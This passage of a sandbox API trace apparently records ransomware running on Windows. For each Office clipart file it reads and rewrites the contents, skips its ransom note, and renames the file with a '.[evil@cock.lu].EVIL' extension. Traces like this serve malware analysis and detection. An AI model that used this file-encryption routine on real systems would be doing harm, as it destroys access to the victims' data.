Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg.[evil@cock.lu].evil")) returned 1 [0167.638] ??_V@YAXPEAX@Z () returned 0x1 [0167.640] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG", dwFileAttributes=0x200) returned 0 [0167.641] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.641] wcsstr (_Str="PH03224I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.641] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG") returned 69 [0167.641] wcscmp (_String1="PH03224I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03224I.JPG") returned 0x0 [0167.641] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG") returned 0x45 [0167.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.642] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa445, lpOverlapped=0x0) returned 1 [0167.649] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.649] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.649] _errno () returned 0x84b1160840 [0167.649] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.650] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xa460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa460, lpOverlapped=0x0) returned 1 [0167.650] CloseHandle (hObject=0x1a8) returned 1 [0167.650] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.650] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.650] __uncaught_exception () returned 0x84b1160800 [0167.650] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.650] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg.[evil@cock.lu].evil")) returned 1 [0167.651] ??_V@YAXPEAX@Z () returned 0x1 [0167.654] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG", dwFileAttributes=0x200) returned 0 [0167.654] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.654] wcsstr (_Str="PH03379I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.654] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG") returned 69 [0167.654] wcscmp (_String1="PH03379I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.654] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03379I.JPG") returned 0x0 [0167.654] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG") returned 0x45 [0167.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.656] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ba2, lpOverlapped=0x0) returned 1 [0167.663] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.663] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.663] _errno () returned 0x84b1160840 [0167.663] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.663] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2bc0, lpOverlapped=0x0) returned 1 [0167.663] CloseHandle (hObject=0x1a8) returned 1 [0167.663] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.664] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.664] __uncaught_exception () returned 0x84b1160800 [0167.664] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.664] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg.[evil@cock.lu].evil")) returned 1 [0167.665] ??_V@YAXPEAX@Z () returned 0x1 [0167.668] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG", dwFileAttributes=0x200) returned 0 [0167.668] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.668] wcsstr (_Str="PH03380I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.668] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG") returned 69 [0167.668] wcscmp (_String1="PH03380I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.668] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03380I.JPG") returned 0x0 [0167.668] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG") returned 0x45 [0167.668] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.670] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x321f, lpOverlapped=0x0) returned 1 [0167.677] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.677] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.677] _errno () returned 0x84b1160840 [0167.677] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.677] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3220, lpOverlapped=0x0) returned 1 [0167.677] CloseHandle (hObject=0x1a8) returned 1 [0167.678] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.678] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.678] __uncaught_exception () returned 0x84b1160800 [0167.678] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.678] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg.[evil@cock.lu].evil")) returned 1 [0167.679] ??_V@YAXPEAX@Z () returned 0x1 [0167.682] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG", dwFileAttributes=0x200) returned 0 [0167.682] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.682] wcsstr (_Str="PH03425I.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.682] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG") returned 69 [0167.682] wcscmp (_String1="PH03425I.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.682] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH03425I.JPG") returned 0x0 [0167.682] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG") returned 0x45 [0167.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.684] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbdae, lpOverlapped=0x0) returned 1 [0167.699] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.699] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.699] _errno () returned 0x84b1160840 [0167.699] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.699] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbdc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbdc0, lpOverlapped=0x0) returned 1 [0167.699] CloseHandle (hObject=0x1a8) returned 1 [0167.699] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.699] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.699] __uncaught_exception () returned 0x84b1160800 [0167.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.700] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg.[evil@cock.lu].evil")) returned 1 [0167.701] ??_V@YAXPEAX@Z () returned 0x1 [0167.703] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG", dwFileAttributes=0x200) returned 0 [0167.703] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.703] wcsstr (_Str="PRRT.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.703] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF") returned 65 [0167.703] wcscmp (_String1="PRRT.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.703] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PRRT.WMF") returned 0x0 [0167.703] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF") returned 0x41 [0167.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.705] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xef6, lpOverlapped=0x0) returned 1 [0167.710] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.710] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.710] _errno () returned 0x84b1160840 [0167.710] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.710] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf00, lpOverlapped=0x0) returned 1 [0167.710] CloseHandle (hObject=0x1a8) returned 1 [0167.711] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.711] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.711] __uncaught_exception () returned 0x84b1160800 [0167.711] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.711] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf.[evil@cock.lu].evil")) returned 1 [0167.712] ??_V@YAXPEAX@Z () returned 0x1 [0167.715] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF", dwFileAttributes=0x200) returned 0 [0167.715] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.715] wcsstr (_Str="PRRTINST.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.715] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF") returned 69 [0167.715] wcscmp (_String1="PRRTINST.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.715] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PRRTINST.WMF") returned 0x0 [0167.715] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF") returned 0x45 [0167.715] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.717] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7aac, lpOverlapped=0x0) returned 1 [0167.723] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.723] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.723] _errno () returned 0x84b1160840 [0167.723] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.723] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7ac0, lpOverlapped=0x0) returned 1 [0167.723] CloseHandle (hObject=0x1a8) returned 1 [0167.723] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.723] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.724] __uncaught_exception () returned 0x84b1160800 [0167.724] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.724] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf.[evil@cock.lu].evil")) returned 1 [0167.725] ??_V@YAXPEAX@Z () returned 0x1 [0167.727] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF", dwFileAttributes=0x200) returned 0 [0167.727] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.727] wcsstr (_Str="PSRETRO.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF") returned 68 [0167.727] wcscmp (_String1="PSRETRO.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.727] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PSRETRO.WMF") returned 0x0 [0167.728] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF") returned 0x44 [0167.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.729] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d6, lpOverlapped=0x0) returned 1 [0167.735] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.735] _errno () returned 0x84b1160840 [0167.735] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.735] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e0, lpOverlapped=0x0) returned 1 [0167.735] CloseHandle (hObject=0x1a8) returned 1 [0167.735] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.736] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.736] __uncaught_exception () returned 0x84b1160800 [0167.736] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.736] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf.[evil@cock.lu].evil")) returned 1 [0167.737] ??_V@YAXPEAX@Z () returned 0x1 [0167.740] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF", dwFileAttributes=0x200) returned 0 [0167.741] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.741] wcsstr (_Str="PSSKETLG.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.741] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF") returned 69 [0167.741] wcscmp (_String1="PSSKETLG.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.741] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PSSKETLG.WMF") returned 0x0 [0167.741] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF") returned 0x45 [0167.741] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.743] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe0a, lpOverlapped=0x0) returned 1 [0167.749] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.749] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.749] _errno () returned 0x84b1160840 [0167.749] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.749] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0167.749] CloseHandle (hObject=0x1a8) returned 1 [0167.749] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.749] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.749] __uncaught_exception () returned 0x84b1160800 [0167.749] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.750] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf.[evil@cock.lu].evil")) returned 1 [0167.750] ??_V@YAXPEAX@Z () returned 0x1 [0167.753] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF", 